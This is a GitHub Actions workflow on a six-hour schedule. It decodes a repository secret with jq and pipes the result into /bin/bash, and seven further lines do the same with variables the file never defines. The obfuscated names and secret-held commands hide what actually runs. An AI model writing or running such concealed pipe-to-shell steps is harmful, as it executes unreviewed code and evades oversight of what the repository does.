name: jixiaxingliang

on:
  workflow_dispatch:
  schedule:
    - cron: '4 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jixiaxingliang
        env:
          xnj55: ${{ secrets.xnj55 }}
        run: |
          echo $xnj55 | jq -r .ur413 | /bin/bash
          echo $g946 | jq -r .vv41002 | /bin/bash
          echo $oxly076 | jq -r .uf64 | /bin/bash
          echo $swo4038 | jq -r .h19815 | /bin/bash
          echo $bz86823 | jq -r .npd8 | /bin/bash
          echo $k2 | jq -r .lo855 | /bin/bash
          echo $ey41459 | jq -r .hmn890 | /bin/bash
          echo $idzj864 | jq -r .pttq13853 | /bin/bash

